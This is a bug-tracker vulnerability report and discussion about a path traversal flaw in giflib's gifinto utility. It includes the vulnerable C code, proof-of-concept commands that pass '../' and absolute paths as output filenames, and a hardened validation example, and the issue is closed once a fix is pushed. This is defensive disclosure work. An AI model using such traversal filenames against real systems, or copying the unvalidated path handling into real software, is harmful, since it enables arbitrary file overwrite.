#179 Path Traversal vulnerability in giflib's gifinto utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.

Milestone: v1.0_(example)
Status: closed
Owner: nobody
Labels: None
Priority: 1
Updated: 2026-02-19
Created: 2025-04-05
Private: No
# Summary

Path Traversal vulnerability in giflib's `gifinto` utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.

# Report Description

Path Traversal vulnerability in giflib’s `gifinto` utility allows attackers to create or overwrite files in arbitrary directories due to insufficient validation of user-supplied filenames.

# Vulnerability Description

File: `gifinto.c`

The utility accepts a filename via command-line arguments (parsed by `GAGetArgs()`), extracts its directory portion, and uses it to create a temporary file (`TempInto.XXXXXX`).  
If the input file exceeds `MinFileSize` (14 bytes), the temporary file is renamed to the original filename.

However, no validation is performed to prevent the use of `../` (relative path traversal) or absolute paths.  
This allows an attacker to supply a crafted filename and cause file creation in unintended locations.

## Vulnerable Code Snippet

```c
/* Isolate the directory where our destination is, and set tmp file name */
/* in the very same directory. This code is insecure because it creates */
/* predictable names, but it's not worth the effort and risk to fix. */
if (*FileName == NULL) {
    GIF_EXIT("No valid Filename given.");
}
if (strlen(*FileName) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
memset(FullPath, '\0', sizeof(FullPath));
strncpy(FullPath, *FileName, STRLEN);
if ((p = strrchr(FullPath, '/')) != NULL ||
    (p = strrchr(FullPath, '\\')) != NULL) {
    p[1] = 0;
} else if ((p = strrchr(FullPath, ':')) != NULL) {
    p[1] = 0;
} else {
    FullPath[0] = 0; /* No directory or disk specified. */
}
if (strlen(FullPath) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strncpy(FoutTmpName, FullPath, STRLEN); /* First setup the Path */
/* then add a name for the tempfile */
if ((strlen(FoutTmpName) + strlen(DEFAULT_TMP_NAME)) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strcat(FoutTmpName, DEFAULT_TMP_NAME);
#ifdef _WIN32
char *tmpFN = _mktemp(FoutTmpName);
#endif
```

# Reproduction Steps / Proof of Concept (PoC)

1. Compile the utility:

   ```sh
   gcc -o gifinto gifinto.c getarg.c -I.
   ```

2. Create a minimal GIF file:

   ```sh
   echo -n "GIF89a1234567890" > test-sandeep.gif
   ```

3. Normal operation (expected behavior):

   ```sh
   cat test-sandeep.gif | ./gifinto output-sandeep.gif
   ```

   Expected: `output-sandeep.gif` is created in the current directory.

4. Exploit using path traversal:

   ```sh
   cat test-sandeep.gif | ./gifinto ../traversal-sandeep.gif
   cat test-sandeep.gif | ./gifinto /tmp/absolute-sandeep.gif
   ```

   Observed: files are created outside the intended directory (e.g., in the parent directory or `/tmp`), confirming the vulnerability.

## Verification

```sh
ls -l output-sandeep.gif ../traversal-sandeep.gif /tmp/absolute-sandeep.gif
```

# Impact Analysis

This vulnerability can be exploited by any user or attacker with access to execute the vulnerable `gifinto` utility.
By supplying a malicious filename containing relative or absolute paths, an attacker can create or overwrite arbitrary files on the file system.

Exploiting this flaw may lead to:

- File Overwrite/Corruption: Unauthorized modification or replacement of critical system or application files.
- Denial-of-Service (DoS): Disruption of normal operations by corrupting essential files.
- Privilege Escalation / Arbitrary Code Execution: If critical executables or scripts are overwritten, the attacker may escalate privileges or execute arbitrary code.
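The following is an added example, not giflib's code and not the fix that was later pushed. `vulnerable_dir_part()` reproduces the directory-isolation logic of the snippet above to show that `../` and absolute prefixes pass straight through; `safe_output_name()` is a hypothetical hardened check that accepts only a bare filename in the current directory; `open_temp_in_cwd()` replaces the predictable `TempInto.XXXXXX` name with `mkstemp(3)`. Writes happen with the privileges of whoever runs `gifinto`, so the check limits where that user can be tricked into writing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define STRLEN 512

/* gifinto.c's directory isolation: keep everything up to the last '/', '\\'
 * or ':' as the temp-file directory; "../" and absolute paths pass through. */
static void vulnerable_dir_part(const char *name, char *dir, size_t dirlen) {
    char *p;
    memset(dir, 0, dirlen);
    strncpy(dir, name, dirlen - 1);
    if ((p = strrchr(dir, '/')) != NULL || (p = strrchr(dir, '\\')) != NULL)
        p[1] = '\0';
    else if ((p = strrchr(dir, ':')) != NULL)
        p[1] = '\0';
    else
        dir[0] = '\0';          /* no directory or drive given */
}

/* Hypothetical hardened check (added here, not giflib's fix): accept only a
 * bare file name, so output can land only in the cwd. 0 = ok, -1 = rejected. */
static int safe_output_name(const char *name, char *out, size_t outlen) {
    if (name == NULL || *name == '\0' || strlen(name) >= outlen)
        return -1;
    if (strpbrk(name, "/\\:") != NULL)       /* separator or drive colon */
        return -1;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;                           /* directory entries, not files */
    strcpy(out, name);                       /* length bounded above */
    return 0;
}

/* Unpredictable temp file in the current directory via mkstemp(3): created
 * O_EXCL with mode 0600, unlike the predictable TempInto.XXXXXX + _mktemp. */
static int open_temp_in_cwd(char *tmpl, size_t tmpllen) {
    if (tmpllen < sizeof("TempInto.XXXXXX"))
        return -1;
    strcpy(tmpl, "TempInto.XXXXXX");
    return mkstemp(tmpl);                    /* fd, or -1 with errno set */
}

int main(void) {
    char dir[STRLEN], out[STRLEN];
    vulnerable_dir_part("../traversal-sandeep.gif", dir, sizeof dir);
    printf("temp dir \"%s\", hardened check -> %d\n", dir,
           safe_output_name("../traversal-sandeep.gif", out, sizeof out));
    return 0;
}
```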

# Discussion

  • Sebastian Pipping

    @thecybersandeep are you aware of any CVE assigned to or requested for this?

     
    • Sandeep Wawdane

      Sandeep Wawdane - 2025-04-07

      Hi @hartwork,
      I have already requested a CVE for this vulnerability.
      Once the CVE ID is assigned, I will update you and add it here.

       
  • Sebastian Pipping

    @thecybersandeep perfect, thank you!

     
  • Sebastian Pipping

    @thecybersandeep maybe I overlooked something — did you create a patch? Are you aware of a patch for this by anyone else?

     
  • Sebastian Pipping

    @thecybersandeep greetings, any updates on the topics of CVE number and/or availability of a patch? Thanks!

     
  • Sandeep Wawdane

    Sandeep Wawdane - 2025-04-14

    @hartwork Thanks for asking!

    CVE Number Update:
    I’ve already submitted a request for a CVE ID for this issue. Got a confirmation email with a request ID, so it’s in process with the CVE Assignment Team.

    Patch Details:
    1. Filename Check: basename() can be used to strip out any directory paths from the input filename, and anything with .. or / is blocked to prevent path traversal tricks.
    2. Safe File Creation: Temporary files are made in a secure way (like TempInto.XXXXXX) without using user input for paths.
    3. Controlled Output: The final file is only saved in the current directory using the cleaned-up filename, so no chance of writing files elsewhere.

    I’m hoping this will help secure gifinto properly!

    I’ll keep you posted on the CVE updates. If you have more questions, just ping me!

    Best,
    Sandeep

     
  • Eric S. Raymond

    Eric S. Raymond - 2026-02-19
    • Description has changed:

    Diff:

    --- old
    +++ new
    @@ -1,4 +1,3 @@
    -
     ```markdown
     # Summary
    
    • status: open --> closed
     
  • Eric S. Raymond

    Eric S. Raymond - 2026-02-19

    Fix pushed.

     
